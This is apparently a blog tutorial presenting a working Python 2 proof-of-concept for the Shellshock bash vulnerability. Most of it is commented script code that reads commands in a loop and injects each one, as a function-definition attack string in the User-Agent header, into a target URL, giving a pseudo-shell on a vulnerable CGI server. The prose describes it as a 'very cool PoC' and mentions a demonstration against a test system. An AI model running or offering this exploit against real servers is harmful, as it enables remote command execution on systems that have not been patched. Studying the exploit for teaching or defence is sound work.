This Python snippet is a very cool PoC because it drops the user into what feels like a command shell on the target.  The intention is to make the user feel like they have a shell on the system.  It will basically loop through sending requests to the server with a modified User-Agent sending the attack string.

The commented code below wraps an HTTP request with an endless loop grabbing input from the user to pass as the payload.  You can see how to make an HTTP request and modify the User-Agent using Python:


#!/usr/bin/python
import sys, urllib2    # Import the required modules for the vulnerability

if len(sys.argv) != 2:    # Checks to be sure that a URL was supplied as a sys argument "<script> <URL>"
  print "Usage: "+sys.argv[0]+" <URL>"
  sys.exit(0)

URL=sys.argv[1]        # Assigns URL variable and prints out message
print "[+] Attempting Shell_Shock - Make sure to type full path"

while True:        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
  command=raw_input("~$ ")
  opener=urllib2.build_opener()        # Modifying the default request to include the attack string via User-Agent
  opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ' /bin/bash -c "'+command+'"')]
  try:                    # Sets up a Try/Except loop so exceptions are handled cleanly
    response=opener.open(URL)    # Sends request and prints the response
    for line in response.readlines():
      print line.strip()
  except Exception as e: print e

Below we demonstrate this script in action interacting with a vulnerable test system.  You can see how it looks like a command shell in the top window, but it is actually just sending HTTP GET requests to the vulnerable system in the bottom window:

shell_1